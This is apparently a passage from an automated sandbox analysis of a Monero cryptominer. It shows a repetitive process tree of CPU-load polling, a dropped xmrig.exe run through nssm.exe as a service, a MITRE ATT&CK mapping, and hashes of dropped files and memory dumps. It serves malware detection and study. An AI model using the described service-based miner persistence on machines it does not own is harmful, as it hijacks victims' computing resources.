      wmic cpu get loadpercentage
      4⤵
      PID:4200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2940
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4172
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3644
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3540
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2404
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4956
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1824
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3076
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3096
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4492
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4532
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:404
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2756
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4892
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3724
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5088
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1368
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2596
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4312
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3684
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4048
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3120
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:880
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:872
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:916
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1180
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1808
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2512
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4488
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3472
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1760
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1396
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3876
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3720
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3652
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:456
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3780
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5076
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4508
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1096
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1936
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3672
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3008
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1480
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4880
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1452
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4440
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1612
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3732
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3804
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1056
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:336
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4836
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4600

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:3828
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
96b70b8e21dc1bfc2282c4280a13adb6

SHA1
9333527888e05ffab1a1110cfd5f8c0f6b68e33b

SHA256
60b11fdcc364332a8ba1fbdce201fabfd3fd094470679439d87b97757bbe895f

SHA512
2e54085fa70c0cc6f80027dbdfe9279317250b2371b208d0ed4c68da964569b47269b88935892f5ce89adae801814c8b3a1cd3739f2ff28d0d24d3a4dedb3d08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b5352c55a8e79ac8de4be3202d496a1

SHA1
4a263d9e36e5ef972e4b19035cae169e1df6459c

SHA256
eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

SHA512
c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5dd71d523efc8f2be3a11d5e17cab217

SHA1
969898e5cae865b997a3dec00119b36ae4d4cb0e

SHA256
f6cdab7d98e043c51ee5f47e81d7948bc832ef8ef865e3c4e35c590ebbb54f8c

SHA512
79db5154e2356ba359dcf72f21f5feff724cfaee6c5a3a1b14b29a66e052f365f4794eefcf0986840565c8562a5a773fde43d54a8c6c2b787962acc3567292d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5f9a00260954d3c8bba0a561b1700ed8

SHA1
440e4e8ae26e5725ef22b9295b58eb25f29b3158

SHA256
464bb8ace67ea85c285ea8531797e61c87906e9a3e074feec06458e710b93bbf

SHA512
dd71181681a93dbe37a4cb0c6946f67b88a81c012a13d4be33a89fd422eb4e8573e59c4bdfe0eb4d4de36281eaa5cd1223fdcaead9795d983e079665c6be06e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
58324433df92ef9335cc57395d35c8f7

SHA1
7395363a8cdcb6e608c44334a24ae55c81310862

SHA256
7ffd50d30bbd0def7fe4c752a43b2fa188bb902975a08ca260d9d9d97ab31b73

SHA512
71ff7226530edb55ef30f6e611425d4894600bb66ad80654b9761801dca04bd3556fe0c7f6d3847a52e9654bd5d1deed4920ccefb72174647febef47eb1b519f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e34dd3044b20c870061176c36d7dbc78

SHA1
6344cd0f56c45a2f7164fece6d53303d3074406d

SHA256
93e5fcdff24c6a619f636d746c514ec932cfe37b9207c2b4bb8dedfd458fe74b

SHA512
03d68564fd4b7f3f71fb675f94b88cd22d2c9fab1a3d8734a9539de526a187231753adcdc5e76935e8b2f452d34425f6a160c6b875772be7681ddd6a4735e077

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c472fa578b9280413edf1ae57b2b444d

SHA1
3aab61593918faeb383d58046e047a374c0b6647

SHA256
aba8f0e9126b4afbb6a6f0dabb3976f19d52cb80799d5cf3d37c8b0641ee981a

SHA512
a17121c7eaf814ad20aef3701cc71a1bd4cafdbd341fb30af0b6f08282e660f541a35c93aae23208213c408d6d4e843f15fe9cc7dc0885eea7552e6b6284b5c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ce2aa405586b36e25dbcf16db6407de7

SHA1
cd813b6cce76c2be9b40511da77a6bd5482f2c49

SHA256
bbb76f3b8fc701b3fc6ea6344d5f7ce3ccf36f20ed7905f6eed86314293df91f

SHA512
33625acf695b43a7d6a68571f8fa8de90edf1afdd9585faff15710147c5d573bc2f2a8cfd40999adf719af7b4ebba1988899136dc4e5ea80bcc9ff53dd53d376

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f7f4750861af9a9a4ab5a330b46f862

SHA1
4d5644ec09a9110a86dde73e1e33a5c49e7a5ef1

SHA256
0048c273229b318dae47a6b86462f2e775b159a8054bb939eb6fbc9efbb33e19

SHA512
96231e6626751dba1b421cf5e7fde8df01cef439e9f4783609587674e728ed35fd7f55f73127301f758f0e773a764f18d0bd693ce02ce8ea3fbe1cfffa7f231e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b90efd974eddd9f07d74e6daa9285779

SHA1
eab0a1356a4bbd54f8d2f0d1b1373c5ec5dcb3bb

SHA256
b525be72aa216eb30620c35eb5bb4dd6f40e2a05998d7886a0a86c1b3ca05272

SHA512
d7c27366fd984c10d99a51d48944ebf4525b95a201705169ecf5242a802669eb9964fc2afefb1eaae8c91cda265d4e5e508a71697eb9e807160a6097e00e53ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2419d068e09423d5e7edec9bb8010870

SHA1
445b4a6ebefa37ee91ff5a18a3b8e6ae6af40fba

SHA256
d308e6cb382517e03b6773d345b2e68e57fe80ce636901ab95da87ba29d6c0ac

SHA512
053cb92ad73f842f22200dd39082a22474277816b1de63a722b881225218849e1d5038fe3caec8f2067c5e6ab593917d1ad7278038c154077e7e2b14d72f3264

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1783bbab6d916497b1207cd0b11a8081

SHA1
b5bc137f8c95f7ddc27e75b2b83848c1f0a2ca6f

SHA256
6ec30692cee1446f62ea96ffe91a4e61293f548f288e27b22c757489a919530a

SHA512
89a5a83d294de1c7801f499955255394112a2ee1d951f7809e8e1f5f02d24dce7e19b024b22cc61094f8b8de6b68bce85b684ce53396a85bad341093b14e97af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
693a6c13dbc942375d71e4700aaa4008

SHA1
1fadf93d742184054a4976ea258788d080c9cd5f

SHA256
d05312bda2303dbfb6973613fe522cb863b22207e0277e2059b9de0b94a73f41

SHA512
cc506a937c951d97afcc85e72455bd44f8aab059759d23734894b12d26375dce1b3db7628f97096dfbfc625be211267f0b7779702b3e1eeec1b99e9e0778ae99

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vjsiaud4.fxt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\script_5472b326.bat

Filesize
556B

MD5
889ed31bd87dcdd18996201e93fca965

SHA1
bebcb6fa0d36fabc6edc469cc3177251bd50dbb8

SHA256
6fd0f837746697ef471db89d8fa9290114c4c2dd416020f5ad9dc1837fb16ee7

SHA512
11e131928d8a7fd30b20943aeda62a9185b9b961fc577a75a6de87635b5a89a13fcbbfbbf0abd8e6a5cdc3052ef98c40bbebb33252ec00e73fcf18debda10f0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp831A.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
643e93f2b1c2d387c434289f0fbd3903

SHA1
d3f888d9765e0c38d6f7ae43ae4609168e6139ba

SHA256
3be873c0947be13d0261d1215f7047a6539bc9de515a97ca82c63310ad9c7976

SHA512
53588c391a050b1d19af711dad9d9721d23908d1d5293f43ac2e22667b79aff8a6b2e5bc473ec5701a690d95b2f187cb3f101847ea6f321c9def52441cdf8c91

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
15ebe1e5896e94763dd24c188e9b2f55

SHA1
4f83e0ac83484b39e3a405a5d3e09934d635af8f

SHA256
b5901d130177878bfead9374afad28a54205aefabe1de8b248008b335b2dba9e

SHA512
4d492f108ec2fcbc79d8dad4640674f5395308ef77306a379d392693bd27d92c531bb4973d45aa0eaadfd2dffd9457d43f259334d10cd6d2d883c0a0601f33d7

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
812e75c3ad0cee459cf0e6d99d51dc45

SHA1
0123342e1312a1d12776982a72a10c063c665692

SHA256
4a93b2e739cfa44cd3551907d5f391c1ca0652b05a13c17b436b87bccc8861d9

SHA512
a796687ede8bda7032e3a8e72eb4c53c00f1683faa533e844968bb781032d5d12636528ab4829560c9bc9335c0edf5bcff83bd03d4f48d2c7fb05358f4d93559

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
39d462f5763a275cc4d62e9f5930a891

SHA1
2e2a318ade4e652b1cb61604fa5c81497c03b6fd

SHA256
7bea0c5b23089418645c174996c2c698c87d5c966e9c7e4860ace032a6d2c67c

SHA512
67ec7b3c7e2e5c69708f520cbae08b991139133b5cc2623384d61c757148ebe4c0f75aef319fbc1756b973041bf72556b2dde5b20a701408aa0737d99a16f8fe

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/1800-80-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1800-79-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/1808-53-0x000001D1712E0000-0x000001D1712EA000-memory.dmp

Filesize
40KB

Download
memory/1808-54-0x000001D171310000-0x000001D171322000-memory.dmp

Filesize
72KB

Download
memory/3572-225-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-242-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-275-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-274-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-273-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-214-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-215-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-216-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-217-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-218-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-219-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-220-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-221-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-222-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3572-223-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
